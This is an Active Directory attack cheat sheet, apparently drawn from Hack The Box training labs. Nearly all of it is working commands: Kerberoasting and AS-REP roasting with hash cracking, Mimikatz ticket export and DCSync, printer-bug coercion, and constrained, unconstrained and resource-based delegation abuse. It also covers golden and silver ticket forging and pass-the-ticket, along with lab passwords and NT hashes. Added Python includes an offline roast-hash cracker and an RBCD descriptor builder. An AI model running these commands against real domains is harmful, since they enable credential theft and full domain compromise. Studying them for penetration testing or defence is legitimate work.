Kerberos Attacks

From Linux


# Impacket GetUserSPNs.py (the tool name was missing from the page; these are its flags)
# Request 1 Ticket
GetUserSPNs.py -dc-ip <ip> <domain>/<user> -request-user <username>

# Request All Tickets
GetUserSPNs.py -dc-ip <ip> <domain>/<user> -request

# Save to Output File
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

# Crack TGS Ticket (hashcat mode 13100 = Kerberos 5 TGS-REP etype 23)
hashcat -m 13100 sqldev_tgs $ROCKYOU

From Windows


# Find Accounts with SPN
setspn.exe -Q */*

# Better Command: request a TGS for every SPN into the current logon session (needs the System.IdentityModel assembly loaded; tickets are then exported with Mimikatz below)
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }


# Mimikatz: Enable Base64 Output
base64 /out:true

# Mimikatz: Export Tickets (each ticket is printed as a base64 blob)
kerberos::list /export

# Strip the line breaks from the copied blob
echo "<base64 blob>" | tr -d \\n > encoded_file

# Decode the blob into a .kirbi file
cat encoded_file | base64 -d > sqldev.kirbi

# Convert the .kirbi to John format (kirbi2john.py; the script name was missing from the page)
python2.7 kirbi2john.py sqldev.kirbi > sqldev_tgs_john

# Hashcat way: rewrite the John line into the $krb5tgs$23$*...* format that hashcat -m 13100 expects
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' sqldev_tgs_john > sqldev_tgs_hashcat


# Import Module
Import-Module .\PowerView.ps1

# List Users With SPN
Get-DomainUser * -spn | select samaccountname

# Target Single User + Hashcat Output
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat


# Rubeus: statistics on Kerberoastable accounts (encryption types, password-last-set year) without requesting any ticket
.\Rubeus.exe kerberoast /stats

# Rubeus: only roast accounts with admincount=1 (privileged/protected users), one hash per line
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Double Hop Workarounds

Method 1: PSCredential Object

# Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force

# Build the credential object
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

# Pass it explicitly to every command that has to reach another host (the remote session holds no TGT to forward)
Get-DomainUser -SPN -Credential $Cred | select samaccountname

Method 2: Register PSSession Configuration

# Check whether a TGT is present in the session (without one, the second hop fails)
klist

# Register a session configuration on the host you remote into (elevated shell on that host; restart the WinRM service afterwards when prompted)
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm

# Connect using the new configuration; commands now run as backupadm with a TGT in the session
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess

Roasting Attacks

AS-REP Roasting (Windows)

AS-REP Roasting Enumeration

# PowerView: Discover accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH)
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname,useraccountcontrol

# Rubeus: find every account with pre-authentication disabled and request its AS-REP, hashcat format
Rubeus.exe asreproast /format:hashcat

Performing AS-REP Roasting

# Rubeus: roast a single user, one hash per line
.\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt

# Crack the hash (hashcat mode 18200 = Kerberos 5 AS-REP etype 23)
hashcat.exe -m 18200 hashes.txt $ROCKYOU

Forcing AS-REP Roastability

# PowerView: with GenericWrite/GenericAll over a user, flip DONT_REQ_PREAUTH (0x400000 = 4194304) in its userAccountControl; run the same XOR again to revert it
Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

AS-REP Roasting (Linux)

# Impacket GetNPUsers.py (the tool name was missing from the page; these are its flags)
# Enumerate AS-REP roastable users with a valid account and request their hashes
GetNPUsers.py inlanefreight.local/pixis -request

# Without credentials: test a list of usernames for pre-authentication disabled
GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip <ip> -usersfile /tmp/users.txt -format hashcat -no-pass
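Both roasting attacks on this page are cracked offline for the same reason: the captured material is an RC4-HMAC (etype 23) enc-part whose key is the unsalted NT hash of a password, so the hashcat -m 13100 and -m 18200 commands above never need to talk to a DC. The following Python is an added example and not code from the page or from any of the tools it lists. It implements the per-candidate check those two hashcat modes perform (NT hash via MD4, RFC 4757 key derivation, RC4 decrypt, HMAC-MD5 checksum) for both hash-line formats. Everything in it is constructed: the passwords, the confounder, the filler enc-part and the tiny wordlist; a real enc-part is ASN.1, which the check never has to parse.

```python
import hmac
import struct

# Added example: the offline check hashcat modes 13100 ($krb5tgs$23$) and 18200
# ($krb5asrep$23$) run per candidate. RFC 4757 RC4-HMAC, key = NT hash (MD4, no salt).

def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    # Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(48):
            j = i % 16
            if i < 16:
                f, k, s = (B & C) | (~B & D), j, (3, 7, 11, 19)[j % 4]
            elif i < 32:
                f, k, s = ((B & C) | (B & D) | (C & D)) + 0x5A827999, (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4]
            else:
                f, k, s = (B ^ C ^ D) + 0x6ED9EBA1, r3_order[j], (3, 9, 11, 15)[j % 4]
            A, B, C, D = D, _lrot((A + f + X[k]) & 0xFFFFFFFF, s), B, C
        a, b, c, d = ((a + A) & 0xFFFFFFFF, (b + B) & 0xFFFFFFFF,
                      (c + C) & 0xFFFFFFFF, (d + D) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for ch in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(ch ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

# Key usage: 2 for a ticket's enc-part (what Kerberoasting cracks). MS-KILE uses 8, not
# RFC 4120's 3, for the RC4 AS-REP enc-part, and the hashcat modes follow suit.
USAGE = {"krb5tgs": 2, "krb5asrep": 8}

def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    # RFC 4757 encrypt: (checksum, ciphertext) are the two fields stored in the hash line
    k1 = hmac.new(key, struct.pack("<I", usage), "md5").digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum, rc4(k3, data)

def rc4_hmac_verify(key, usage, checksum, ciphertext):
    # The cracker's test for one candidate: derive keys, decrypt, recompute the checksum
    k1 = hmac.new(key, struct.pack("<I", usage), "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    data = rc4(k3, ciphertext)
    return hmac.compare_digest(hmac.new(k1, data, "md5").digest(), checksum)

def format_roast_hash(kind, user, realm, spn, checksum, ciphertext):
    if kind == "krb5asrep":
        return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ciphertext.hex()}"
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${ciphertext.hex()}"

def parse_roast_hash(line):
    # Returns (key usage, checksum, ciphertext) for a mode 13100 or 18200 hash line
    if line.startswith("$krb5asrep$23$"):
        usage, enc = USAGE["krb5asrep"], line.split(":", 1)[1]
    elif line.startswith("$krb5tgs$23$*"):
        usage, enc = USAGE["krb5tgs"], line.split("*$", 1)[1]
    else:
        raise ValueError("not an etype-23 roast hash")
    checksum, ciphertext = enc.split("$")
    return usage, bytes.fromhex(checksum), bytes.fromhex(ciphertext)

def crack(line, wordlist):
    usage, checksum, ciphertext = parse_roast_hash(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), usage, checksum, ciphertext):
            return candidate
    return None

# Constructed samples (assumed passwords, fixed confounder, filler enc-part; not real tickets)
_CONFOUNDER = bytes(range(8))   # a real ticket uses 8 random bytes
_ENC_PART = b"\x00" * 64        # stands in for the ASN.1 enc-part
SAMPLE_ASREP = format_roast_hash("krb5asrep", "jenna.smith", "INLANEFREIGHT.LOCAL", None,
                                 *rc4_hmac_encrypt(nt_hash("Summer2023!"), USAGE["krb5asrep"], _ENC_PART, _CONFOUNDER))
SAMPLE_TGS = format_roast_hash("krb5tgs", "sqldev", "INLANEFREIGHT.LOCAL", "MSSQLSvc/SQL01:1433",
                               *rc4_hmac_encrypt(nt_hash("Database1"), USAGE["krb5tgs"], _ENC_PART, _CONFOUNDER))
WORDLIST = ["password", "Welcome1", "Database1", "Summer2023!"]
```

Run `crack(SAMPLE_ASREP, WORDLIST)` and `crack(SAMPLE_TGS, WORDLIST)` to recover the two constructed passwords. The check is identical whichever tool produced the line, and it shows why restricting service accounts to AES (etype 17/18) matters as a mitigation: an AES key comes from PBKDF2 over a salted password rather than a single MD4, so each guess costs orders of magnitude more, and the RC4 hash line those modes expect is never issued.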

Kerberoasting (Windows)

Manual Enumeration (PowerShell Script)

# Lists every user object that has at least one SPN, without third-party tooling
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach ($result in $results) {
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User"
    Write-Host "===="
    Write-Host $userEntry.name "(" $userEntry.distinguishedName ")"
    Write-Host ""
    Write-Host "SPNs"
    Write-Host "===="
    foreach ($SPN in $userEntry.servicePrincipalName) {
        Write-Host $SPN
    }
    Write-Host ""
    Write-Host ""
}

# Run Script: save the above as a .ps1 file and execute it from a domain-joined host

Find Accounts with SPN (PowerView)

# Find Accounts
Get-DomainUser -SPN | select samaccountname, serviceprincipalname, memberof

Invoke Kerberoasting (PowerView)

# Request a TGS for every SPN user and print the hashes in hashcat format
Invoke-Kerberoast -OutputFormat Hashcat | fl

Rubeus Kerberoasting

Rubeus.exe kerberoast /nowrap

Kerberoasting Without Account Password

In order to perform this attack, we need the following:

  1. Username of an account with pre-authentication disabled (the AS-REQ is sent on its behalf, so no password is needed).

  2. A target SPN.

Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap

Kerberoasting (Linux)

# Impacket GetUserSPNs.py (the tool name was missing from the page): list SPN accounts and request their tickets
GetUserSPNs.py inlanefreight.local/pixis -request

Unconstrained Delegation

Unconstrained Delegation - Computer

Method 1 (Wait for Authentication)

1 Monitor Stored Tickets (Rubeus, on the unconstrained-delegation host)

# Every user or computer that authenticates to this host leaves a forwarded TGT in LSASS; print new ones as they arrive
.\Rubeus.exe monitor /interval:5 /nowrap

2 Use a Captured TGT to Request a Service Ticket

.\Rubeus.exe asktgs /ticket:<base64> /service:cifs/dc01.INLANEFREIGHT.local /ptt

3 Use the New Ticket

dir \\dc01.inlanefreight.local\c$

Method 2 (Printer Bug)

1 Monitor Tickets (on the unconstrained-delegation host, here sql01)

.\Rubeus.exe monitor /interval:5 /nowrap

2 Abuse the Printer Bug

# Force dc01's spooler to authenticate to sql01; the DC's TGT is forwarded to sql01 and caught by monitor
.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local

3 Capture & Renew Ticket

# Once intercepted, renew the DC01$ TGT and inject it into the current session
.\Rubeus.exe renew /ticket:<base64> /ptt

4 DCSync

# DC01$ holds replication rights, so with its TGT we can dump any account's hash (Mimikatz)
.\mimikatz.exe "lsadump::dcsync /user:administrator /domain:inlanefreight.local" "exit"

5 Use the NT Hash

# With DCSync we can get every hash; use the administrator hash to request a TGT (overpass-the-hash)
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt

# Perform actions on DC01
dir \\dc01.inlanefreight.local\c$

Unconstrained Delegation - Users

Gather Unconstrained Delegation Users (PowerView)

# 524288 = TRUSTED_FOR_DELEGATION bit of userAccountControl
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol

1 Create Fake DNS Record

# krbrelayx dnstool.py (the tool name was missing from the page): add an A record for a rogue host pointing at the attacker (<attacker-ip> is a placeholder)
python dnstool.py -u INLANEFREIGHT.LOCAL\\pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d <attacker-ip> --action add dc01.inlanefreight.local

2 Verify DNS

nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local

3 Craft SPN

# krbrelayx addspn.py: add CIFS/roguecomputer to the unconstrained-delegation user sqldev (needs write access to its servicePrincipalName)
python addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

4 Start the Listener That Decrypts Incoming Tickets

# krbrelayx.py with sqldev's NT hash: whoever authenticates to the new SPN sends an AP-REQ encrypted with sqldev's key, and because sqldev is trusted for delegation the client's TGT rides inside it
sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58

5 Leverage the Printer Bug

# krbrelayx printerbug.py: coerce dc01 into authenticating to the rogue host (must be the name registered in DNS above)
python3 printerbug.py inlanefreight.local/carole.rose:jasmine@dc01.inlanefreight.local roguecomputer.inlanefreight.local

6 Perform Attack

# The listener from step 4 extracts DC01$'s TGT from the coerced authentication and writes it to a .ccache file in its working directory

7 Export ccache + Secrets Dump

export KRB5CCNAME=<ccache>

# Impacket secretsdump.py with the DC's TGT (the tool name was missing from the page)
secretsdump.py -k -no-pass dc01.inlanefreight.local

Constrained Delegation

Constrained Delegation (Windows)

Gather Constrained Delegation Computers

# PowerView: computers with TRUSTED_TO_AUTH_FOR_DELEGATION set (msDS-AllowedToDelegateTo lists the SPNs they may delegate to)
Get-DomainComputer -TrustedToAuth | select serviceprincipalname,dnshostname,useraccountcontrol

1 Get Machine Hash (Mimikatz)

# Dump the NT hash of the delegating machine account (DMZ01$) from LSASS
.\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"

2 Constrained Delegation Attack

# Rubeus S4U2Self + S4U2Proxy with the machine account's rc4 hash: impersonate Administrator to the allowed SPN (www/WS01), then swap the service to HTTP for WinRM
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt

# Verify the injected ticket
klist

# Enter Session (the HTTP/WS01 ticket is what PSRemoting needs)
Enter-PSSession ws01.inlanefreight.local

Constrained Delegation (Linux)

1 Find Delegation Accounts

# Impacket findDelegation.py (the tool name was missing from the page): lists accounts with delegation rights and the SPNs they may delegate to
findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine

2 Craft a Valid TGS Ticket

# Impacket getST.py: S4U2Self + S4U2Proxy as the delegating account; -spn must be service/host from msDS-AllowedToDelegateTo (cifs assumed here)
getST.py -spn cifs/SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator

3 Login With TGS Ticket

# Export the ccache written by getST.py
export KRB5CCNAME=<ccache>

# Login with Impacket psexec.py; the target must be the host named in the SPN above
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@SERVER01 -debug

Resource Based Delegation (Windows)

Enumerate RBCD Script

# Finds users holding write-class rights (GenericWrite/GenericAll/WriteProperty/WriteDacl) on a computer object, i.e. candidates to set msDS-AllowedToActOnBehalfOfOtherIdentity on it

# import the PowerView module
Import-Module C:\Tools\PowerView.ps1

# get all computers in the domain
$computers = Get-DomainComputer

# get all users in the domain
$users = Get-DomainUser

# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"

# loop through each computer in the domain
foreach ($computer in $computers) {
    # get the DACL of the computer object (older PowerView spells this Get-ObjectAcl -SamAccountName)
    $acl = Get-DomainObjectAcl -Identity $computer.SamAccountName -ResolveGUIDs

    # loop through each user in the domain (direct user SIDs only; rights granted through group membership are not resolved here)
    foreach ($user in $users) {
        # check if the user has any of the required access rights on the computer object
        $hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}

        if ($hasAccess -contains $true) {
            Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
        }
    }
}

1 Create Fake Computer

# Import PowerMad
Import-Module .\Powermad.ps1

# Add New Computer
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)

2 Modify Attributes Created Computer

  1. Obtain Computer SID.

  2. Use SDDL to create a security descriptor

  3. Set msDS-AllowedToActOnBehalfOfOtherIdentity in raw binary format.

  4. Modify the target computer.

# Import PowerView
Import-Module .\PowerView.ps1

# Step 1
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid

# Step 2
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

# Step 3: credentials of the account that holds write rights over the target computer object
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)

# Step 4: write the descriptor to the target; DC01 now trusts HACKTHEBOX$ to act on behalf of other identities
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose

3 Get Computer Hash

.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local

4 Request TGS Ticket

# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt

# Connect to DC
ls \\dc01.inlanefreight.local\c$
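The byte string that Step 2 above produces from the SDDL is a self-relative security descriptor with one ACCESS_ALLOWED ACE for the fake computer's SID and the full-control mask 0x000F01FF. The following Python is an added example, not code from the page or from PowerView, Rubeus or Impacket: it builds that descriptor by hand per [MS-DTYP] and parses one back, which is useful both when the attribute has to be written from Linux and when auditing msDS-AllowedToActOnBehalfOfOtherIdentity values pulled from LDAP. The domain SID is the page's; the RID 1109 assigned to HACKTHEBOX$ is assumed.

```python
import struct

# Added example: the bytes behind O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>), built and
# parsed per [MS-DTYP]. Layout: SECURITY_DESCRIPTOR header, owner SID, ACL, one ACE.

ACCESS_MASK = 0x000F01FF          # CC DC LC SW RP WP DT LO CR SD RC WD WO (full control)
BUILTIN_ADMINS = "S-1-5-32-544"   # the BA owner from O:BA
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00

def sid_to_bytes(sid):
    # "S-1-5-21-..." -> revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities
    parts = sid.split("-")
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(buf, off=0):
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))

def build_rbcd_sd(allowed_sid):
    # Self-relative SECURITY_DESCRIPTOR: owner BA, no group/SACL, DACL with a single ACCESS_ALLOWED_ACE
    sid = sid_to_bytes(allowed_sid)
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), ACCESS_MASK) + sid
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(ace), 1, 0) + ace   # ACL revision 2, one ACE
    owner = sid_to_bytes(BUILTIN_ADMINS)
    header_len = 20
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         header_len, 0, 0, header_len + len(owner))   # offsets: owner, group, sacl, dacl
    return header + owner + dacl

def parse_rbcd_sd(sd):
    # Returns [(sid, access_mask), ...] for every ACCESS_ALLOWED_ACE in the DACL
    _rev, _sbz, control, _owner, _group, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _acl_rev, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append((bytes_to_sid(sd, pos + 8), mask))
        pos += ace_size
    return allowed

def who_can_act_on_behalf(sd):
    # SIDs granted the full-control mask: the principals the target trusts for RBCD
    return [sid for sid, mask in parse_rbcd_sd(sd) if mask & ACCESS_MASK == ACCESS_MASK]

# Constructed: the page's domain SID with an assumed RID 1109 for HACKTHEBOX$
FAKE_COMPUTER_SID = "S-1-5-21-1870146311-1183348186-593267556-1109"
RBCD_SD = build_rbcd_sd(FAKE_COMPUTER_SID)

if __name__ == "__main__":
    print(RBCD_SD.hex())
    print(who_can_act_on_behalf(RBCD_SD))
```

A defender who reads the attribute from LDAP gets exactly these bytes; passing them to who_can_act_on_behalf lists which principals the computer trusts, which is the check to run over every computer object after an incident. The SDDL path used by PowerView yields ACL revision 2 as here; Impacket's rbcd.py writes revision 4 (ACL_REVISION_DS), and the DC accepts both.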

Resource Based Delegation (Linux)

1 Create a New Computer

# Impacket addcomputer.py (the tool name was missing from the page); a normal user can do this while ms-DS-MachineAccountQuota is above 0
addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass 'Hackthebox123+!' -dc-ip <ip> inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd'

2 Add Computer to Trusted List

# rbcd.py from tothi/rbcd-attack (matches the -t/-f flags on the page); Impacket's rbcd.py equivalent is: rbcd.py -delegate-from 'HACKTHEBOX$' -delegate-to 'DC01$' -action write
python3 rbcd.py -dc-ip <ip> -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'

3 Request TGS Ticket

# Impacket getST.py as the fake machine account: S4U2Self for Administrator, then S4U2Proxy to cifs/DC01
getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip <ip> 'inlanefreight.local/HACKTHEBOX$:Hackthebox123+!'

4 Export ccache & Login

# Export ccache
export KRB5CCNAME=<ccache>

# Impacket psexec.py with the forged service ticket
psexec.py -k -no-pass dc01.inlanefreight.local

Ticket Abuse

Golden Ticket (Windows)

We need 4 elements in order to perform a Golden Ticket attack.

  1. Domain Name

  2. Domain SID

  3. KRBTGT's Hash

  4. Username to impersonate

1 Gather Domain Name

# PowerView (the command was missing from the page)
Get-Domain | select Name

2 Gather Domain SID

# PowerView
Get-DomainSID

3 Gather krbtgt Hash

# DCSync the krbtgt account (needs replication rights, i.e. Domain Admin or equivalent)
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" "exit"

4 Forge Golden Ticket

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"

5 Login

Enter-PSSession dc01

Golden Ticket (Linux)

1 Gather Domain SID

# Impacket lookupsid.py (the tool name was missing from the page)
lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

2 Create Golden Ticket

# Impacket ticketer.py with the krbtgt NT hash; writes Administrator.ccache
ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator

3 Import and Use the Ticket

export KRB5CCNAME=<ccache>

# Login with Impacket psexec.py
psexec.py -k -no-pass dc01.inlanefreight.local

Silver Ticket (Windows)

1 Gather Domain SID

# PowerView
Get-DomainSID

2 Compromised Service Account

The ticket is encrypted with the service account's key, so its NT hash (or AES key) is required: for CIFS on sql01 that is the machine account SQL01$. Without it, a silver ticket is not possible.

3 Forge Silver Ticket

.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs  /ptt" "exit"

Create Sacrificial Process

# Create Process
Rubeus.exe createnetonly /program:cmd.exe /show

# Import Silver Ticket
Rubeus.exe ptt /ticket:sql01.kirbi

# Login
PSExec.exe -accepteula \\sql01.inlanefreight.local cmd

Silver Ticket (Linux)

1 Retrieve Dom­ain SID

# Impacket lookupsid.py (the tool name was missing from the page)
lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids

2 Create Silver Ticket

# Impacket ticketer.py with the service account's NT hash and the target SPN; the DC is never contacted
ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator

3 Export ccache

export KRB5CCNAME=<ccache>

# Login with Impacket psexec.py
psexec.py -k -no-pass sql01.inlanefreight.local

Pass The Ticket

Pass-the-Ticket reuses a stolen Kerberos ticket instead of a password or hash. A TGT is encrypted with the krbtgt account's key and carries the user's PAC (group memberships); presenting it to the Domain Controller yields service tickets (TGS) for individual hosts, and a service ticket can be used directly against the host it was issued for. Stealing either kind of ticket from LSASS makes lateral movement possible for as long as the ticket is valid (a TGT can also be renewed, as below).

1 Create Sacrificial Process

.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

2 Read Tickets

.\rubeus.exe triage

3 Extract Ticket With Rubeus

# Dump the TGT (krbtgt service) of the chosen logon session as base64; reading other sessions' tickets requires an elevated context
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

4 Renew Ticket

Rubeus.exe renew /ticket:<base64> /ptt

5 Read Files

dir \\dc01\c$
